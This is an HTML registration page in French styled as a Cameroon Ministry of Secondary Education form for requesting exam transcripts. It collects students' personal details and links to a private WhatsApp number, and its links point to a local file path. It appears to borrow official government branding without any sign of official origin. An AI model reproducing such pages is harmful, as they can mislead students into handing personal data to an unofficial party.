<!DOCTYPE html>
<html lang="fr">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/css/bootstrap.min.css" integrity="sha384-T3c6CoIi6uLrA9TneNEoa7RxnatzjcDSCmG1MXxSR1GAsXEV/Dwwykc2MPK8M2HN" crossorigin="anonymous">
    <title>Inscription aux Examens</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #f0f0f0;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
            flex-direction: column;
            padding: 10px;
            box-sizing: border-box;
        }
        .header {
            text-align: center;
            margin-top: 30px;
            margin-bottom: 20px;
            width: 100%;
        }
        .header .row {
            display: flex;
            justify-content: space-between;
            align-items: center;
            flex-wrap: wrap;
        }
        .header .column {
            text-align: center;
            flex: 1;
            min-width: 200px;
            margin: 10px 0;
        }
        .header img {
            height: 50px;
            margin: 5px;
        }
        .form-container {
            background-color: #ffffff;
            padding: 20px;
            border-radius: 5px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
            width: 100%;
            max-width: 600px;
            box-sizing: border-box;
        }
        .form-container h2 {
            margin-bottom: 20px;
        }
        .form-group {
            margin-bottom: 15px;
        }
        .form-group label {
            display: block;
            margin-bottom: 5px;
        }
        .form-group input, .form-group select {
            width: 100%;
            padding: 8px;
            box-sizing: border-box;
        }
        .button-link {
            display: inline-block;
            padding: 10px 20px;
            background-color: #007bff;
            color: #ffffff;
            text-decoration: none;
            border-radius: 5px;
            border: none;
            cursor: pointer;
            font-size: 16px;
            transition: background-color 0.3s ease;
        }
        .button-link:hover {
            background-color: #0056b3;
        }
        .message {
            display: none;
            margin-top: 20px;
            padding: 10px;
            background-color: #dff0d8;
            color: #3c763d;
            border: 1px solid #d6e9c6;
            border-radius: 5px;
            text-align: center;
        }
        .logo {
            margin-top: 20px;
            text-align: center;
        }
        .logo img {
            width: 100px;
            height: auto;
        }
        /* Style spécifique pour le bouton WhatsApp */
        #whatsapp-button {
            display: inline-block;
            padding: 10px 20px;
            background-color: #25d366;
            color: #ffffff;
            text-decoration: none;
            border-radius: 5px;
            border: none;
            cursor: pointer;
            font-size: 16px;
            transition: background-color 0.3s ease;
        }
        #whatsapp-button:hover {
            background-color: #1ebe57;
        }
    </style>
</head>
<body>
    <div class="header">
        <div class="row w-100 d-flex justify-content-between">
            <div class="w-50 align-items-center" style="font-size: 12px; text-align: center;">
                <span>REPUBLIQUE DU CAMEROUN</span><br>
                <span>*</span><br>
                <span>PAIX-TRAVAIL-PATRIE</span><br>
                <span>*</span>
                <br>
                <span>Ministere des enseignements secondaire</span><br>
            </div>
            <div class="w-50 align-items-center" style="font-size: 12px; text-align: center;">
                <span>REPUBLIC OF CAMEROON</span><br>
                <span>*</span><br>
                <span>PEACE-WORK-FATHERLAND</span><br>
                <span>*</span>
                <br>
                <span>Ministry of secondary <br> education</span><br>
            </div>
        </div>
        <div class="row w-100">
            <div style="margin-left: 0%;">
                <img src="https://th.bing.com/th/id/OIP.LjQ7gB5z_0Zf2lDvCmY67QAAAA?rs=1&pid=ImgDetMain" style="width: 70px; height: 70px;" alt="">
            </div>
        </div>
    </div>
    <div class="form-container">
        <h2>Formulaire d'inscription pour l'obtention du relevé de note</h2>
        <form id="registrationForm" method="POST" action="">
            <div class="form-group">
                <label for="nom"></label>
                <input type="text" id="nom" name="nom" placeholder="Nom" required>
            </div>
            <div class="form-group">
                <label for="prenom"></label>
                <input type="text" id="prenom" name="prenom" placeholder="Prénom" required>
            </div>
            <div class="form-group">
                <label for="sexe"></label>
                <select id="sexe" name="sexe" required>
                    <option value="">Choisir votre sexe</option>
                    <option value="Masculin">Masculin</option>
                    <option value="Féminin">Féminin</option>
                </select>
            </div>
            <div class="form-group">
                <label for="dob">Choisir votre date de naissance</label>
                <input type="date" id="dob" name="dob" placeholder="Date de naissance" required>
            </div>
            <div class="form-group">
                <label for="classe"></label>
                <select id="classe" name="classe" required>
                    <option value="">Choisir votre classe</option>
                    <option value="Troixième Esp">Troixièmes</option>
                    <option value="Première D">Premières</option>
                    <option value="Terminale D">Terminales</option>
                </select>
            </div>
            <div class="form-group">
                <label for="filiere"></label>
                <input type="text" id="filiere" name="filiere" placeholder="Filière" required>
            </div>
            <div class="form-group">
                <label for="matricule"></label>
                <input type="text" id="matricule" name="matricule" placeholder="Matricule" required>
            </div>
            <div class="form-group">
                <label for="centre"></label>
                <input type="text" id="centre" name="centre" placeholder="Centre d'examen" required>
            </div>
            <div class="form-group">
                <label for="sous-centre"></label>
                <input type="text" id="sous-centre" name="sous-centre" placeholder="Sous-Centre" required>
            </div>
            <div class="form-group text-center">
                <a href="H:/WWW/invest/africa/sites/Examens/confirmation.html" class="button-link">Enregistrer</a>
            </div>
        </form>
        <div class="message" id="confirmationMessage">Inscription réussie ! Vous avez été enregistré.</div>
    </div>
    <div class="logo">
        <button id="whatsapp-button">Contact WhatsApp</button>
    </div>

    <script>
        // Définir la date maximale pour le champ de date de naissance comme aujourd'hui
        document.getElementById('dob').max = new Date().toISOString().split("T")[0];

        // Fonction de validation du formulaire
        function validateForm() {
            var nom = document.getElementById('nom').value.trim();
            var prenom = document.getElementById('prenom').value.trim();
            var sexe = document.getElementById('sexe').value;
            var classe = document.getElementById('classe').value;
            var matricule = document.getElementById('matricule').value.trim();
            var centre = document.getElementById('centre').value.trim();
            var sousCentre = document.getElementById('sous-centre').value.trim();
            var filiere = document.getElementById('filiere').value.trim();
            var dob = document.getElementById('dob').value.trim();
            // Vérification si tous les champs sont remplis
            if (nom === "" || prenom === "" || sexe === "" || classe === "" || matricule === "" || centre === "" || sousCentre === "" || filiere === "" || dob === "") {
                alert("Veuillez remplir tous les champs du formulaire.");
                return false; // Empêcher l'envoi du formulaire
            }

            return true; // Autoriser l'envoi du formulaire si tous les champs sont remplis
        }

        // Écouter l'événement de soumission du formulaire
        document.getElementById('registrationForm').addEventListener('submit', function(event) {
            event.preventDefault(); // Empêcher l'envoi par défaut

            // Valider le formulaire avant l'envoi
            if (validateForm()) {
                var nom = document.getElementById('nom').value.trim();
                var prenom = document.getElementById('prenom').value.trim();
                var sexe = document.getElementById('sexe').value;
                var classe = document.getElementById('classe').value;
                var matricule = document.getElementById('matricule').value.trim();
                var centre = document.getElementById('centre').value.trim();
                var sousCentre = document.getElementById('sous-centre').value.trim();
                var filiere = document.getElementById('filiere').value.trim();
                var dob = document.getElementById('dob').value;

                // Envoi des données au serveur
                var formData = new FormData();
                formData.append('nom', nom);
                formData.append('prenom', prenom);
                formData.append('sexe', sexe);
                formData.append('classe', classe);
                formData.append('matricule', matricule);
                formData.append('centre', centre);
                formData.append('sous-centre', sousCentre);
                formData.append('filiere', filiere);
                formData.append('dob', dob);

                fetch('', {
                    method: 'POST',
                    body: formData
                })
                .then(response => response.text())
                .then(data => {
                    // Rediriger vers la page de confirmation
                    window.location.href = 'H:/WWW/invest/africa/sites/Examens/confirmation.html';
                })
                .catch(error => console.error('Error:', error));
            }
        });

        // Fonctionnalité du bouton WhatsApp
        document.getElementById('whatsapp-button').addEventListener('click', function() {
            var whatsappNumber = '237671700846';
            var url = 'https://wa.me/' + whatsappNumber;
            window.open(url, '_blank');
        });
    </script>
</body>
</html>
